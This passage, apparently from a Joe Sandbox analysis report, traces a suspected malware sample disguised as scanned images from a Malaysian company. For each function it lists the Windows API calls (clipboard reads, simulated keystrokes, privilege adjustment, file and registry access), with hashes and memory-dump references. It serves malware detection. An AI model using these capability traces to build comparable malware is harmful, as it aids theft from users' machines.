                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                        • Instruction ID: a2b32ab706954b5ec646d7c97f6e6e51b17328f3b8172b67dde5d19269538508
                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                        • Instruction Fuzzy Hash: 9431E579A00105EFC718DF58C481969F7B6FF99300B648AA5E60ACB651D731EDD1EBC0
                                                        Function 016922A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Sleep.KERNELBASE(000001F4), ref: 016922B1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1341240796.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1690000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID:
                                                        • API String ID: 3472027048-0
                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                        • Instruction ID: 5a4d17210a1e6748ea73793577bdc2b4c1e1e4526e8fdcd7acd102da0ff27d19
                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                        • Instruction Fuzzy Hash: 75E0E67494010EEFDF00EFB4D94969E7FB4EF04701F1041A5FD01D2281D6309D508A72

                                                        Non-executed Functions

                                                        Function 00AACDAC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 637windowkeyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A22612: GetWindowLongW.USER32(?,000000EB), ref: 00A22623
                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00AACE50
                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00AACE91
                                                        • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00AACED6
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00AACF00
                                                        • SendMessageW.USER32 ref: 00AACF29
                                                        • _wcsncpy.LIBCMT ref: 00AACFA1
                                                        • GetKeyState.USER32(00000011), ref: 00AACFC2
                                                        • GetKeyState.USER32(00000009), ref: 00AACFCF
                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00AACFE5
                                                        • GetKeyState.USER32(00000010), ref: 00AACFEF
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00AAD018
                                                        • SendMessageW.USER32 ref: 00AAD03F
                                                        • SendMessageW.USER32(?,00001030,?,00AAB602), ref: 00AAD145
                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00AAD15B
                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00AAD16E
                                                        • SetCapture.USER32(?), ref: 00AAD177
                                                        • ClientToScreen.USER32(?,?), ref: 00AAD1DC
                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00AAD1E9
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00AAD203
                                                        • ReleaseCapture.USER32 ref: 00AAD20E
                                                        • GetCursorPos.USER32(?), ref: 00AAD248
                                                        • ScreenToClient.USER32(?,?), ref: 00AAD255
                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00AAD2B1
                                                        • SendMessageW.USER32 ref: 00AAD2DF
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00AAD31C
                                                        • SendMessageW.USER32 ref: 00AAD34B
                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00AAD36C
                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00AAD37B
                                                        • GetCursorPos.USER32(?), ref: 00AAD39B
                                                        • ScreenToClient.USER32(?,?), ref: 00AAD3A8
                                                        • GetParent.USER32(?), ref: 00AAD3C8
                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00AAD431
                                                        • SendMessageW.USER32 ref: 00AAD462
                                                        • ClientToScreen.USER32(?,?), ref: 00AAD4C0
                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00AAD4F0
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00AAD51A
                                                        • SendMessageW.USER32 ref: 00AAD53D
                                                        • ClientToScreen.USER32(?,?), ref: 00AAD58F
                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00AAD5C3
                                                          • Part of subcall function 00A225DB: GetWindowLongW.USER32(?,000000EB), ref: 00A225EC
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00AAD65F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                        • String ID: @GUI_DRAGID$@U=u$F
                                                        • API String ID: 3977979337-1007936534
                                                        • Opcode ID: d1a97edccd2aa8e95bae6fb70431f61d7858393f8330d565ff85fec6a54a78d5
                                                        • Instruction ID: f1e878fb7bd28a2b876826a3004daffb431dbe65e02a5b277c3182781a0b552b
                                                        • Opcode Fuzzy Hash: d1a97edccd2aa8e95bae6fb70431f61d7858393f8330d565ff85fec6a54a78d5
                                                        • Instruction Fuzzy Hash: 6F42AD30204341EFD725CF68C984BAABBE5FF4A364F14092DF696972E1D7329851CB92
                                                        Function 00AA804A Relevance: 61.8, APIs: 33, Strings: 2, Instructions: 571windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00AA873F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: %d/%02d/%02d$@U=u
                                                        • API String ID: 3850602802-2764005415
                                                        • Opcode ID: 42f42d974bc075e20878849b23a66fea114b50b63ed063e6c607f5bd27864bc9
                                                        • Instruction ID: 1508b41fb4b50ad038bba3abc930f55b1c72f5fbb59d4c15c1828ad5475f2383
                                                        • Opcode Fuzzy Hash: 42f42d974bc075e20878849b23a66fea114b50b63ed063e6c607f5bd27864bc9
                                                        • Instruction Fuzzy Hash: C512C071500245AFEB258F68CD49FAA7BB8EF4A710F244129F915EB2E1DF788941CB50
                                                        Function 00A3710E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5093COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _memmove$_memset
                                                        • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                        • API String ID: 1357608183-1798697756
                                                        • Opcode ID: 1a942bf26445d2231ef3f2dd998b34d87abebbceda72bc71cf489fa1eca2b141
                                                        • Instruction ID: 106987517d62d2e1d2d0021470761c293acc0a80a822c5bd977b53aa147456ce
                                                        • Opcode Fuzzy Hash: 1a942bf26445d2231ef3f2dd998b34d87abebbceda72bc71cf489fa1eca2b141
                                                        • Instruction Fuzzy Hash: 1E939176A00215DFDF24CF98C881BADB7B1FF48710F25C16AE959AB281E7749E81DB40
                                                        Function 00A24A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetForegroundWindow.USER32(00000000,?), ref: 00A24A3D
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A5DA8E
                                                        • IsIconic.USER32(?), ref: 00A5DA97
                                                        • ShowWindow.USER32(?,00000009), ref: 00A5DAA4
                                                        • SetForegroundWindow.USER32(?), ref: 00A5DAAE
                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00A5DAC4
                                                        • GetCurrentThreadId.KERNEL32 ref: 00A5DACB
                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00A5DAD7
                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 00A5DAE8
                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 00A5DAF0
                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 00A5DAF8
                                                        • SetForegroundWindow.USER32(?), ref: 00A5DAFB
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A5DB10
                                                        • keybd_event.USER32(00000012,00000000), ref: 00A5DB1B
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A5DB25
                                                        • keybd_event.USER32(00000012,00000000), ref: 00A5DB2A
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A5DB33
                                                        • keybd_event.USER32(00000012,00000000), ref: 00A5DB38
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A5DB42
                                                        • keybd_event.USER32(00000012,00000000), ref: 00A5DB47
                                                        • SetForegroundWindow.USER32(?), ref: 00A5DB4A
                                                        • AttachThreadInput.USER32(?,?,00000000), ref: 00A5DB71
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 4125248594-2988720461
                                                        • Opcode ID: ff19f41c79386f91883b79a9f93ea943552412535b62c7cfc3327c915dc1e89c
                                                        • Instruction ID: c5ab5785d41e881e146c5a41d65444a37a5649eaaa7291805d173640f93de6d3
                                                        • Opcode Fuzzy Hash: ff19f41c79386f91883b79a9f93ea943552412535b62c7cfc3327c915dc1e89c
                                                        • Instruction Fuzzy Hash: E9315071A40319BEEB35AFE19C49F7F7E6CEB45B51F114025FE04AA1D0D7B05901AAA0
                                                        Function 00A78858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A78CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A78D0D
                                                          • Part of subcall function 00A78CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A78D3A
                                                          • Part of subcall function 00A78CC3: GetLastError.KERNEL32 ref: 00A78D47
                                                        • _memset.LIBCMT ref: 00A7889B
                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00A788ED
                                                        • CloseHandle.KERNEL32(?), ref: 00A788FE
                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00A78915
                                                        • GetProcessWindowStation.USER32 ref: 00A7892E
                                                        • SetProcessWindowStation.USER32(00000000), ref: 00A78938
                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00A78952
                                                          • Part of subcall function 00A78713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A78851), ref: 00A78728
                                                          • Part of subcall function 00A78713: CloseHandle.KERNEL32(?,?,00A78851), ref: 00A7873A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                        • String ID: $default$winsta0
                                                        • API String ID: 2063423040-1027155976
                                                        • Opcode ID: bb5b5373437c6a02898078396dc0db6b5fbbc3a93d2842afcbd19a36ce557c54
                                                        • Instruction ID: c92245bf96e77c3207e616028528e0914ee5798289b63aa4c9657803867829df
                                                        • Opcode Fuzzy Hash: bb5b5373437c6a02898078396dc0db6b5fbbc3a93d2842afcbd19a36ce557c54
                                                        • Instruction Fuzzy Hash: 4B816B71940249AFDF11DFE4DD49AEE7BB8EF04344F08C12AF918A61A1DB398E15DB60
                                                        Function 00A9425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OpenClipboard.USER32(00AAF910), ref: 00A94284
                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 00A94292
                                                        • GetClipboardData.USER32(0000000D), ref: 00A9429A
                                                        • CloseClipboard.USER32 ref: 00A942A6
                                                        • GlobalLock.KERNEL32(00000000), ref: 00A942C2
                                                        • CloseClipboard.USER32 ref: 00A942CC
                                                        • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00A942E1
                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 00A942EE
                                                        • GetClipboardData.USER32(00000001), ref: 00A942F6
                                                        • GlobalLock.KERNEL32(00000000), ref: 00A94303
                                                        • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00A94337
                                                        • CloseClipboard.USER32 ref: 00A94447
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                        • String ID:
                                                        • API String ID: 3222323430-0
                                                        • Opcode ID: 66016c8ef818e250129802228a0cc30981bc5f1262b37ad947435c58a5067be7
                                                        • Instruction ID: 2f15036b8afc9509a5b29a1485a4c3414787a9e4bbb666eafc7c50d1b9a5e68e
                                                        • Opcode Fuzzy Hash: 66016c8ef818e250129802228a0cc30981bc5f1262b37ad947435c58a5067be7
                                                        • Instruction Fuzzy Hash: 31517C31304202AFDB15EFA4ED86FAF77E8AF89B00F104529F556D61E1DB7099068B62
                                                        Function 00A8C9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00A8C9F8
                                                        • FindClose.KERNEL32(00000000), ref: 00A8CA4C
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A8CA71
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A8CA88
                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A8CAAF
                                                        • __swprintf.LIBCMT ref: 00A8CAFB
                                                        • __swprintf.LIBCMT ref: 00A8CB3E
                                                          • Part of subcall function 00A27F41: _memmove.LIBCMT ref: 00A27F82
                                                        • __swprintf.LIBCMT ref: 00A8CB92
                                                          • Part of subcall function 00A438D8: __woutput_l.LIBCMT ref: 00A43931
                                                        • __swprintf.LIBCMT ref: 00A8CBE0
                                                          • Part of subcall function 00A438D8: __flsbuf.LIBCMT ref: 00A43953
                                                          • Part of subcall function 00A438D8: __flsbuf.LIBCMT ref: 00A4396B
                                                        • __swprintf.LIBCMT ref: 00A8CC2F
                                                        • __swprintf.LIBCMT ref: 00A8CC7E
                                                        • __swprintf.LIBCMT ref: 00A8CCCD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                        • API String ID: 3953360268-2428617273
                                                        • Opcode ID: f07dde37b45dc22f8b13a016f27f2156152785bd623842c35e7bb60c8f2519f4
                                                        • Instruction ID: c3de55b1d8e3ec283ffdf2d4db75be510b2ded5d3980df07d5cf3874d197e19d
                                                        • Opcode Fuzzy Hash: f07dde37b45dc22f8b13a016f27f2156152785bd623842c35e7bb60c8f2519f4
                                                        • Instruction Fuzzy Hash: 11A12FB2508315ABC704FBA4DA86DAFB7ECBF94700F404929F585D7191EB34DA09CB62
                                                        Function 00A8F200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 00A8F221
                                                        • _wcscmp.LIBCMT ref: 00A8F236
                                                        • _wcscmp.LIBCMT ref: 00A8F24D
                                                        • GetFileAttributesW.KERNEL32(?), ref: 00A8F25F
                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00A8F279
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00A8F291
                                                        • FindClose.KERNEL32(00000000), ref: 00A8F29C
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00A8F2B8
                                                        • _wcscmp.LIBCMT ref: 00A8F2DF
                                                        • _wcscmp.LIBCMT ref: 00A8F2F6
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00A8F308
                                                        • SetCurrentDirectoryW.KERNEL32(00ADA5A0), ref: 00A8F326
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A8F330
                                                        • FindClose.KERNEL32(00000000), ref: 00A8F33D
                                                        • FindClose.KERNEL32(00000000), ref: 00A8F34F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                        • String ID: *.*
                                                        • API String ID: 1803514871-438819550
                                                        • Opcode ID: 3802053921681cf5eab674b5f58d5cbab39eb8a344a6cb70a4050a4dcdf9f00e
                                                        • Instruction ID: 21faf1ed4cbf0946822a85e2f44c93f99d291270d8f0be4a652b3936a5344d00
                                                        • Opcode Fuzzy Hash: 3802053921681cf5eab674b5f58d5cbab39eb8a344a6cb70a4050a4dcdf9f00e
                                                        • Instruction Fuzzy Hash: E631C27660021A6EDF14EBF4EC48AEE77ACEF49361F104176E861D70A0EB70DA45CB64
                                                        Function 00AA0AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AA0BDE
                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00AAF910,00000000,?,00000000,?,?), ref: 00AA0C4C
                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00AA0C94
                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00AA0D1D
                                                        • RegCloseKey.ADVAPI32(?), ref: 00AA103D
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00AA104A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Close$ConnectCreateRegistryValue
                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                        • API String ID: 536824911-966354055
                                                        • Opcode ID: e220f087fe0ebb04fb20348c0974dcafaf1aa2a7a2fae48fda9019b6e54a3947
                                                        • Instruction ID: 6918b18431bfeb01dcb7134b8ecb5466ac0ef77415082ce53b679030f29e11ec
                                                        • Opcode Fuzzy Hash: e220f087fe0ebb04fb20348c0974dcafaf1aa2a7a2fae48fda9019b6e54a3947
                                                        • Instruction Fuzzy Hash: E60270756006119FDB14EF28D981E2AB7E5FF89720F04896DF88A9B3A1CB31ED41CB41
                                                        Function 00A8F35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 00A8F37E
                                                        • _wcscmp.LIBCMT ref: 00A8F393
                                                        • _wcscmp.LIBCMT ref: 00A8F3AA
                                                          • Part of subcall function 00A845C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00A845DC
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00A8F3D9
                                                        • FindClose.KERNEL32(00000000), ref: 00A8F3E4
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00A8F400
                                                        • _wcscmp.LIBCMT ref: 00A8F427
                                                        • _wcscmp.LIBCMT ref: 00A8F43E
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00A8F450
                                                        • SetCurrentDirectoryW.KERNEL32(00ADA5A0), ref: 00A8F46E
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A8F478
                                                        • FindClose.KERNEL32(00000000), ref: 00A8F485
                                                        • FindClose.KERNEL32(00000000), ref: 00A8F497
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                        • String ID: *.*
                                                        • API String ID: 1824444939-438819550
                                                        • Opcode ID: 6b30d9f6a38588e012859a87214a17cbac43ac53c27a2ea740028a7237d119cf
                                                        • Instruction ID: 3d96f697e238c9cd62a88afd206b79f85130961642272d380fe2d77c03e26295
